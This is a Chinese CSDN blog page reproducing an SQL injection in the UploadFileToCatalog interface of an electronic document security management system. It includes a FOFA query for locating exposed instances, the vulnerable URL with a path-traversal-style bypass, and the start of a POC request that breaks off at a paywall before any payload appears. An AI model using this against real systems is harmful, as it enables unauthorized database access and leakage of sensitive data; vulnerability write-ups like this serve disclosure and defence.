某赛通电子文档安全管理系统 uploadfiletocatalog sql注入

已于 2024-03-20 14:22:35 修改
阅读量41 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-20 14:22:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136875285
版权
本文档介绍了某赛通电子文档安全管理系统存在的SQL注入漏洞,详细描述了漏洞复现环境和过程,以及如何通过构造恶意SQL语句进行攻击。同时,提供了Tscan POC规则编写和修复建议,包括限制访问来源地址和应用官方补丁。
摘要由CSDN通过智能技术生成

产品介绍

某赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

漏洞描述

某赛通电子文档安全管理系统 uploadfiletocatalog 接口存在sql注入漏洞,攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。

复现环境

FOFA:app=”某赛通-电子文档安全管理系统”

漏洞复现

http://your-ip/CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp

POC

POST /CDGServer3/js/../policy/UploadFileToCatalog?fromurl=../user/dataSearch.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safa
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
某赛通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞复现
0xSec
02-02 854
由于某赛通电子文档安全管理系统UploadFileToCatalog接口的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
某赛通电子文档安全管理系统 PolicyAjax SQL注入漏洞复现
0xSec
01-31 1027
由于某赛通电子文档安全管理系统PolicyAjax处的id参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
亿某通电子文档安全管理系统 UploadFileToCatalog SQL注入漏洞
ZL_1618的博客
03-25 859
免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。Ⅰ、漏洞描述亿某通新一代电子文档安全管理系统(简称:CDG)是一款融合文档加密、数据分类分级、访问控制、关联分析、大数据分析、智能识别等核心技术的综合性数据智能安全产品。
某赛通电子文档安全管理系统 多处 SQL注入漏洞复现
0xSec
04-26 1884
某赛通电子文档安全管理系统存在多处SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,进一步利用可获取服务器权限。
某赛通电子文档安全管理系统 加解密工具
08-08
某赛通电子文档安全管理系统 加解密工具
钓赛通-钓鱼比赛计分软件系统
10-21
钓赛通-是一个全平台的钓鱼比赛计分排名软件(公益项目,永久免费)。共支持(安卓手机,苹果手机,IPad,电脑PC,微信小程序)它功能强大,使用方便。 从钓鱼比赛的报名,比赛签到,比赛抽签,比赛成绩计分,比赛排名...
针对被易赛通数据泄露防护客户端加密的文件的解密思路
01-06
针对被易赛通数据泄露防护客户端加密的文件的解密思路 本文主要讨论了如何对被易赛通数据泄露防护客户端加密的文件进行解密的思路。由于工作中需要处理敏感数据,公司要求电脑上必须安装易赛通数据泄露防护客户端,...
matlab中云滴代码-AMF:用于在线QoS预测的自适应矩阵分解
06-02
分布式计算系统国际会议 (ICDCS) ,2014 年。 依赖关系 Python 2.7 () 赛通 0.20.1 () 麻木 1.8.1 () scipy 0.13.3 () 版本 该 repo 在不同的分支中维护了三个版本的 AMF: :python中的当前优化版本 : ICDCS'2014 ...
ising_model:使用 Metropolis 算法对 Ising 模型进行 2D 模拟。 “动态和扩展系统”课程练习@坎塔布里亚大学(西班牙语)。 使用 Cython 库与 Python 接口的 C++11 实现
06-01
赛通 麻木的 matplotlib 克隆存储库 git clone https://github.com/pablodecm/ising_model.git 编译和链接模拟器 Ising 2D 模拟器是用 C++ 实现的,并使用 Cython 链接,需要一个 C+11 兼容的编译器。 要将扩展编译...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 999
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 569
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
漏洞扫描的重要性,如何做好漏洞扫描服务
dexunyun的博客
08-15 844
总之,系统漏洞扫描是守护网络安全的重要防线之一。通过漏洞扫描VSS,丰富的漏洞规则库,可针对各种类型的网站进行全面深入的漏洞扫描,提供专业全面的扫描报告。德迅云安全可以提供有效应对网络安全威胁的解决方案,为用户网络安全提供安全保障。
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 247
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
网络安全: 模型的脆弱性,鲁棒性和隐私性
vivi_cin的博客
08-16 280
因此,在描述 Transformer 模型时,如果你要强调其在网络安全方面的保护能力,可以用“脆弱性、鲁棒性和隐私性”这三个特性来更准确地传达其安全方面的考量。:指保护模型或其训练数据免受信息泄露的能力。隐私性问题在联邦学习和其他分布式学习场景中特别重要,因模型参数的共享可能导致信息泄露。:指模型在某些情况下容易受到攻击或被利用的弱点。例如,模型可能对对抗性攻击或梯度泄露攻击敏感。:指模型抵御攻击和在恶劣环境下保持性能的能力。提高模型的鲁棒性是增强其抵御攻击能力的关键。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 409
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
【网络安全】密码重置中毒实现账户接管
等风来
08-15 173
我输入了新密码,点击“重置密码”。然后,我被导航到登录页面,在那里我输入了电子邮件和新密码,最后成功登录了账户,说明此漏洞是有效的。
网络安全之XSS基础
最新发布
huizhaohaha的博客
08-19 676
是RCDATA元素(RCDATA elements),可以容纳文本和字符引用,注意不能容纳其他元素,HTML解码得到<textarea><script>alert(5)</script>
网络安全(黑客)自学
白帽子凯哥聊黑客
08-16 1525
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
pythoin 调用易赛通解密
01-11
易赛通是一种加密算法,用于加密和解密数据。Python作为一种强大的编程语言,可以轻松调用易赛通解密算法来解密数据。...总之,使用Python调用易赛通解密可以轻松实现数据的解密操作,从而保护数据的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值